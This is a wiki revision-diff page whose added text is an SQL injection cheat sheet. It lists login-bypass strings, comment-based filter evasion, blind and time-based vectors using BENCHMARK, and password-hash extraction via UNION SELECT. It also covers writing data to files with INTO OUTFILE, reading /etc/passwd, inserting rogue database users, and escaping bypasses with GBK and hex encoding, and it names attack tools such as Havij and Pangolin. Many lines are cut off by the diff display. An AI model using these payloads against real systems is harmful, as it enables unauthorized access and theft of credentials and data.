meta data de esta página
Diferencias
Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
seguridad:sql_injection [2013/03/01 14:03] – lc | seguridad:sql_injection [2023/01/18 14:11] (actual) – editor externo 127.0.0.1 | ||
---|---|---|---|
Línea 1: | Línea 1: | ||
==== SQL Injection ==== | ==== SQL Injection ==== | ||
=== Técnicas === | === Técnicas === | ||
+ | < | ||
* /**/ | * /**/ | ||
* /*--*/ | * /*--*/ | ||
Línea 7: | Línea 8: | ||
* %0A | * %0A | ||
* %0D | * %0D | ||
+ | </ | ||
+ | === Técnicas extraidas de 0x000000.com | ||
+ | <code sql> | ||
+ | 1 SELECT * FROM login /* foobar */ | ||
+ | 2 SELECT * FROM login WHERE id = 1 or 1=1 | ||
+ | 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE " | ||
+ | </ | ||
+ | Use inside login form: | ||
+ | < | ||
+ | 01 1' OR 1=1-- | ||
+ | 02 1' OR ' | ||
+ | 03 ' | ||
+ | 04 '' | ||
+ | 05 ' | ||
+ | 06 ') or (' | ||
+ | 07 ") or (" | ||
+ | 08 hi" or " | ||
+ | 09 or a=a-- | ||
+ | 10 admin' | ||
+ | 11 ' or 0=0 -- | ||
+ | 12 " or 0=0 -- | ||
+ | 13 or 0=0 -- | ||
+ | 14 ' or ' | ||
+ | 15 " or " | ||
+ | 16 ') or (' | ||
+ | 17 ' or 1=1-- | ||
+ | 18 " or 1=1-- | ||
+ | 19 or 1=1-- | ||
+ | 20 ' or a=a-- | ||
+ | 21 " or " | ||
+ | </ | ||
+ | Variations: | ||
+ | <code sql> | ||
+ | 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 | ||
+ | 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE " | ||
+ | 03 | ||
+ | 04 SHOW TABLES | ||
+ | 05 SELECT * FROM login WHERE id = 1 or 1=1 AND SHOW TABLES | ||
+ | 06 | ||
+ | 07 SELECT VERSION | ||
+ | 08 SELECT * FROM login WHERE id = 1 or 1=1 AND SELECT VERSION() | ||
+ | 09 | ||
+ | 10 SELECT host, | ||
+ | 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host, | ||
+ | </ | ||
+ | Blind injection vectors collection | ||
+ | <code sql> | ||
+ | Operators | ||
+ | 1 SELECT 1 && 1; | ||
+ | 2 SELECT 1 || 1; | ||
+ | 3 SELECT 1 XOR 0; | ||
+ | </ | ||
+ | <code sql> | ||
+ | Evaluate | ||
+ | 1 all render TRUE or 1. | ||
+ | 2 SELECT 0.1 <= 2; | ||
+ | 3 SELECT 2 >= 2; | ||
+ | 4 SELECT ISNULL(1/ | ||
+ | </ | ||
+ | <code sql> | ||
+ | Math | ||
+ | 1 SELECT FLOOR(7 + (RAND() * 5)); | ||
+ | 2 SELECT ROUND(23.298, | ||
+ | </ | ||
+ | <code sql> | ||
+ | Misc | ||
+ | 1 SELECT LENGTH(COMPRESS(REPEAT(' | ||
+ | 2 SELECT MD5(' | ||
+ | </ | ||
+ | <code sql> | ||
+ | Benchmark | ||
+ | 01 SELECT BENCHMARK(10000000, | ||
+ | 02 (this takes around 5 sec on a localhost) | ||
+ | 03 | ||
+ | 04 SELECT BENCHMARK(1000000, | ||
+ | 05 (this takes around 7 sec on a localhost) | ||
+ | 06 | ||
+ | 07 SELECT BENCHMARK(10000000, | ||
+ | 08 (this takes around 70 sec on a localhost!) | ||
+ | 09 | ||
+ | 10 Using the timeout to check if user exists | ||
+ | 11 SELECT IF( user = ' | ||
+ | </ | ||
+ | Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | ||
+ | Gathering info | ||
+ | <code sql> | ||
+ | Table mapping | ||
+ | 1 SELECT COUNT(*) FROM tablename | ||
+ | </ | ||
+ | <code sql> | ||
+ | Field mapping | ||
+ | 1 SELECT * FROM tablename WHERE user LIKE " | ||
+ | 2 SELECT * FROM tablename WHERE user LIKE " | ||
+ | 3 SELECT * FROM tablename WHERE user = ' | ||
+ | 4 SELECT * FROM tablename WHERE user = ' | ||
+ | </ | ||
+ | <code sql> | ||
+ | User mapping | ||
+ | 1 SELECT * FROM tablename WHERE email = ' | ||
+ | 2 SELECT * FROM tablename WHERE user LIKE " | ||
+ | 3 SELECT * FROM tablename WHERE user = ' | ||
+ | </ | ||
+ | <code sql> | ||
+ | Advanced SQL vectors | ||
+ | Writing info into files. | ||
+ | 1 SELECT password FROM tablename WHERE username = ' | ||
+ | </ | ||
+ | <code sql> | ||
+ | Writing info into files without single quotes: (example) | ||
+ | 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | ||
+ | 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39), | ||
+ | 3 CHAR( 39)) | ||
+ | Note: You must specify a new file, it may not exists and give the correct pathname. | ||
+ | </ | ||
+ | <code sql> | ||
+ | The CHAR() quoteless function. | ||
+ | 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | ||
+ | 2 CHAR(110), | ||
+ | 3 | ||
+ | 4 SELECT * FROM login WHERE user = CHAR(39, | ||
+ | </ | ||
+ | <code sql> | ||
+ | Extracting hashes | ||
+ | 1 SELECT user FROM login WHERE user = ' | ||
+ | 2 UNION SELECT IF(SUBSTRING(pass, | ||
+ | </ | ||
+ | This evaluates the first char of the password hash from user ' | ||
- | === Herramientas === | + | The hash is max 32 chars, and for every chars you'll need to execute the query with CHAR() |
- | Havij -> http:// | + | |
+ | The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | ||
+ | <code sql> | ||
+ | 01 SELECT user FROM login WHERE user = ' | ||
+ | 02 UNION SELECT IF(SUBSTRING(pass, | ||
+ | 03 | ||
+ | 04 1SELECT user FROM login WHERE user = ' | ||
+ | 05 UNION SELECT IF(SUBSTRING(pass, | ||
+ | 06 | ||
+ | 07 where: (passwordfield, | ||
+ | 08 | ||
+ | 09 is like: (password, | ||
+ | 10 is like: (password, | ||
+ | 11 is like: (password, | ||
+ | </ | ||
+ | A quoteless example: | ||
+ | <code sql> | ||
+ | 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | ||
+ | 2 UNION SELECT IF(SUBSTRING(pass, | ||
+ | </ | ||
+ | Possible chars | ||
+ | 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 | ||
+ | Misc. | ||
+ | Insert a new user into DB | ||
+ | <code sql> | ||
+ | 1 INSERT INTO login SET user = ' | ||
+ | </ | ||
+ | Retrieve /etc/passwd file, put it into a field and insert a new user. | ||
+ | < | ||
+ | |||
+ | Then login! | ||
+ | |||
+ | Write the DB user away into tmp | ||
+ | <code sql> | ||
+ | |||
+ | Change admin e-mail, for " | ||
+ | < | ||
+ | |||
+ | Bypassing PHP functions | ||
+ | Bypassing addslashes() with GBK HEX encoding. | ||
+ | < | ||
+ | |||
+ | Using an HEX encoded query to bypass escaping. | ||
+ | <code sql> | ||
+ | 1 Normal: SELECT * FROM login WHERE user = ' | ||
+ | 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | ||
+ | </ | ||
+ | Inserting a new user in SQL. | ||
+ | < | ||
+ | 1 Normal: insert into login set user = ' | ||
+ | 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 | ||
+ | </ | ||
+ | How to determin the HEX value for injection. | ||
+ | <code sql> | ||
+ | |||
+ | With comments. | ||
+ | < | ||
+ | 1 S/ | ||
+ | 2 W/ | ||
+ | </ | ||
+ | Bypassing mysql_real_escape_string() with BIG5 or GBK | ||
+ | < | ||
+ | |||
+ | (MySQL 4.1.x before 4.1.20 and 5.0.x) | ||
+ | |||
+ | |||
+ | ==== Herramientas | ||
+ | | ||
+ | * Havij http:// | ||
+ | * PonyMagic http:// | ||
+ | * General Injection Explorer | ||
+ | * Safe 3 sql injector http:// | ||
+ | * Enema http:// | ||
+ | * Absinthe http:// | ||
+ | * Pangolin http:// | ||
+ | * sql poison | ||
+ | * sql map gui | ||
+ | * bsql hacker http:// | ||
+ | * | ||
Línea 17: | Línea 223: | ||
==== Referencias ==== | ==== Referencias ==== | ||
* http:// | * http:// | ||
+ | * http:// |